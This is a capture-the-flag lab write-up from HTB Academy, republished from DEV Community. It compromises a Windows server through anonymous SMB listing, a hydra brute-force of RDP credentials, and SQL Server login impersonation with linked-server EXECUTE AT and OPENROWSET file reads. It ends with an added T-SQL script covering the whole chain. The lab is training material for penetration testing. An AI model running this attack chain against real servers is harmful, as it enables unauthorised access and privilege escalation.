HTB Academy: Attacking Common Services – Hard Lab



This content originally appeared on DEV Community and was authored by Sara Mazal M.


In this lab, we are tasked with compromising a third internal server within the inlanefreight.htb domain. This server is used to manage files and working materials, such as forms, and it also hosts a database whose purpose is not immediately clear. Our objective is to gain administrative privileges by exploiting vulnerabilities in the server’s configuration.

Objectives

  1. Identify a file belonging to the user “Simon.” (Format: filename.txt)
  2. Enumerate the target and discover a password for the user Fiona.
  3. Once logged in, identify another user we can compromise to escalate privileges and gain administrative access.

Steps to Solution

1. Network and Service Enumeration

First, we run a full-port nmap scan (-p-) with version detection (-sV) and the default script set (-sC) to identify open ports and running services:

nmap -sV -sC -p- $TARGET_IP

Results:

PORT     STATE SERVICE       VERSION
135/tcp  open  msrpc         Microsoft Windows RPC
445/tcp  open  microsoft-ds? (SMB)
1433/tcp open  ms-sql-s      (Microsoft SQL Server)
3389/tcp open  ms-wbt-server Microsoft Terminal Services (RDP)

2. SMB Enumeration

To see which SMB shares the target exposes, we list them with smbclient over a null session (-N sends an empty password, so this works only if anonymous listing is allowed):

smbclient -N -L //10.129.203.10/

Results:

Sharename       Type      Comment
---------       ----      -------
ADMIN$          Disk      Remote Admin
C$              Disk      Default share
Home            Disk
IPC$            IPC       Remote IPC

Next, we connect to the Home share (pressing Enter at the password prompt, again as a null session) and list it recursively, with prompting switched off so that a later mget would not ask for confirmation on every file:

smbclient //10.129.203.10/Home
Password for [WORKGROUP\htb-ac-552074]:
smb: \> recurse ON
smb: \> prompt OFF
smb: \> ls
  .                                   D        0  Thu Apr 21 16:18:21 2022
  ..                                  D        0  Thu Apr 21 16:18:21 2022
  HR                                  D        0  Thu Apr 21 15:04:39 2022
  IT                                  D        0  Thu Apr 21 15:11:44 2022
  OPS                                 D        0  Thu Apr 21 15:05:10 2022
  Projects                            D        0  Thu Apr 21 15:04:48 2022

\HR
  .                                   D        0  Thu Apr 21 15:04:39 2022
  ..                                  D        0  Thu Apr 21 15:04:39 2022

\IT
  .                                   D        0  Thu Apr 21 15:11:44 2022
  ..                                  D        0  Thu Apr 21 15:11:44 2022
  Fiona                               D        0  Thu Apr 21 15:11:53 2022
  John                                D        0  Thu Apr 21 16:15:09 2022
  Simon                               D        0  Thu Apr 21 16:16:07 2022

\OPS
  .                                   D        0  Thu Apr 21 15:05:10 2022
  ..                                  D        0  Thu Apr 21 15:05:10 2022

\Projects
  .                                   D        0  Thu Apr 21 15:04:48 2022
  ..                                  D        0  Thu Apr 21 15:04:48 2022

\IT\Fiona
  .                                   D        0  Thu Apr 21 15:11:53 2022
  ..                                  D        0  Thu Apr 21 15:11:53 2022
  creds.txt                           A      118  Thu Apr 21 15:13:11 2022

\IT\John
  .                                   D        0  Thu Apr 21 16:15:09 2022
  ..                                  D        0  Thu Apr 21 16:15:09 2022
  information.txt                     A      101  Thu Apr 21 16:14:58 2022
  notes.txt                           A      164  Thu Apr 21 16:13:40 2022
  secrets.txt                         A       99  Thu Apr 21 16:15:55 2022

\IT\Simon
  .                                   D        0  Thu Apr 21 16:16:07 2022
  ..                                  D        0  Thu Apr 21 16:16:07 2022
  random.txt                          A       94  Thu Apr 21 16:16:48 2022

        7706623 blocks of size 4096. 3165043 blocks available
smb: \> 

Answer 1: random.txt

3. Password Discovery

Using hydra, we brute-force the Remote Desktop Protocol (RDP) service to discover Fiona's password. RDP brute-forcing is slow and will lock the account out if a lockout policy is in place, so keep hydra's thread count low (the -t option, for example -t 1) and build the wordlist from what the share already gave up: the text files under IT\ are the first place to look for candidate passwords before reaching for a generic list.

hydra -l Fiona -P XXXXX.txt 10.129.xxx.xx rdp

Result:

[3389][rdp] host: 10.129.xxx.xx   login: Fiona   password: $PASSWORD

4. Remote Desktop Access

With the credentials obtained, we establish an RDP connection:

rdesktop -u Fiona -p '$PASSWORD' $TARGET_IP

5. SQL Server Enumeration and Privilege Escalation

Once connected, we open sqlcmd. With no arguments it connects to the local default instance using Windows authentication, so every query runs as Fiona. First we enumerate the tables in the master database:

PS C:\Users\Fiona> sqlcmd

1> SELECT table_name FROM master.INFORMATION_SCHEMA.TABLES;
2> go

To escalate privileges, we impersonate the login john. EXECUTE AS LOGIN succeeds only if our own login holds the IMPERSONATE permission on john (or is already sysadmin), so a successful switch is itself the finding; we then confirm the new identity and check whether it is a member of the sysadmin server role:

EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER;
SELECT IS_SRVROLEMEMBER('sysadmin');
go

Finally, we list the linked servers (sysservers is the legacy compatibility view; sys.servers is the current one) and run queries on the linked server [local.test.linked.srv] with EXECUTE ... AT, which requires RPC Out to be enabled on the link. The remote statement runs under whatever login the link maps us to, and if that context is a member of sysadmin (the IS_SRVROLEMEMBER check), OPENROWSET(BULK ...) has the bulk-load rights it needs to read files from the remote host's filesystem, which is how the flag on the Administrator's desktop is retrieved:

SELECT srvname, isremote FROM sysservers;
go
EXECUTE('SELECT @@servername, @@version, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')') AT [local.test.linked.srv];
go
execute ('select * from OPENROWSET(BULK ''C:/Users/Administrator/desktop/flag.txt'', SINGLE_CLOB) AS Contents') at [local.test.linked.srv];
go

HTB{46u$**********_$3rv3r$}
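The same impersonation and linked-server chain as in step 5, with the catalog checks a tester runs before each step rather than trying it blind. This is an added example written for this page, not code from the original write-up. It is meant to be pasted into sqlcmd on the target as Fiona (Windows authentication); the login john, the linked server name [local.test.linked.srv] and the flag path are the values the write-up shows, and the column and view names are standard SQL Server catalog views (sys.server_permissions, sys.server_principals, sys.servers, sys.linked_logins). Step 5 of the script is the check that explains why the write-up routes the file read through the link: it shows which remote login the link uses, and a fixed remote login with sysadmin rights means every local caller inherits those rights on the remote side.

```sql
-- Added example (not from the original write-up): impersonation and
-- linked-server chain with the checks that justify each step. Run in sqlcmd
-- on the target as Fiona. 'john', [local.test.linked.srv] and the flag path
-- are taken from the write-up; everything else is standard T-SQL.

-- 1. Baseline: who am I, and am I sysadmin already?
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
GO

-- 2. Which logins can be impersonated, and by whom? EXECUTE AS LOGIN only
--    succeeds when our login (or a role it holds) has IMPERSONATE on the
--    target login. In sys.server_permissions, major_id is the impersonated
--    principal and grantee_principal_id is who received the permission.
SELECT tgt.name     AS impersonatable_login,
       grantee.name AS granted_to
FROM sys.server_permissions AS sp
JOIN sys.server_principals  AS tgt     ON tgt.principal_id     = sp.major_id
JOIN sys.server_principals  AS grantee ON grantee.principal_id = sp.grantee_principal_id
WHERE sp.permission_name = 'IMPERSONATE'
  AND sp.class_desc      = 'SERVER_PRINCIPAL'
  AND sp.state_desc      = 'GRANT';
GO

-- 3. Switch to john and re-check. The impersonated context persists across
--    batches until REVERT.
EXECUTE AS LOGIN = 'john';
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;
GO

-- 4. Linked servers. sys.servers replaces the legacy sysservers view.
--    EXECUTE ... AT needs is_rpc_out_enabled = 1; OPENQUERY needs
--    is_data_access_enabled = 1.
SELECT name, product, provider, data_source,
       is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;
GO

-- 5. How does the link authenticate? local_principal_id = 0 is the default
--    mapping for all logins. uses_self_credential = 1 passes the caller's own
--    login through; otherwise remote_name is the fixed remote login every
--    caller becomes, and if that login is sysadmin on the far side, so are we.
SELECT s.name AS linked_server, ll.local_principal_id,
       ll.uses_self_credential, ll.remote_name
FROM sys.linked_logins AS ll
JOIN sys.servers       AS s ON s.server_id = ll.server_id
WHERE s.is_linked = 1;
GO

-- 6. Confirm the remote context. Single quotes are doubled because the
--    statement is a string handed to EXECUTE.
EXECUTE ('SELECT @@SERVERNAME, @@VERSION, SYSTEM_USER, IS_SRVROLEMEMBER(''sysadmin'')')
    AT [local.test.linked.srv];
GO

-- 7. Read the flag through the link. OPENROWSET(BULK ...) requires the
--    ADMINISTER BULK OPERATIONS permission, which sysadmin holds; the single
--    result column of a SINGLE_CLOB read is named BulkColumn.
EXECUTE ('SELECT BulkColumn AS Contents
          FROM OPENROWSET(BULK ''C:\Users\Administrator\Desktop\flag.txt'', SINGLE_CLOB) AS f')
    AT [local.test.linked.srv];
GO

-- 8. Drop the impersonated context when finished.
REVERT;
GO
```

If step 4 shows is_rpc_out_enabled = 0, EXECUTE ... AT fails with an RPC error and OPENQUERY (which needs is_data_access_enabled) is the fallback; if step 5 shows uses_self_credential = 1, the remote context is only as privileged as the local login you impersonated, and the read in step 7 will fail unless that login is sysadmin or bulkadmin on the remote side.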

By systematically enumerating services, discovering valid credentials, and leveraging SQL Server commands, we were able to compromise multiple user accounts, ultimately gaining administrative access to the server. The contents of the flag.txt file were retrieved from the Administrator’s desktop, completing the task.

HAPPY HACKING!


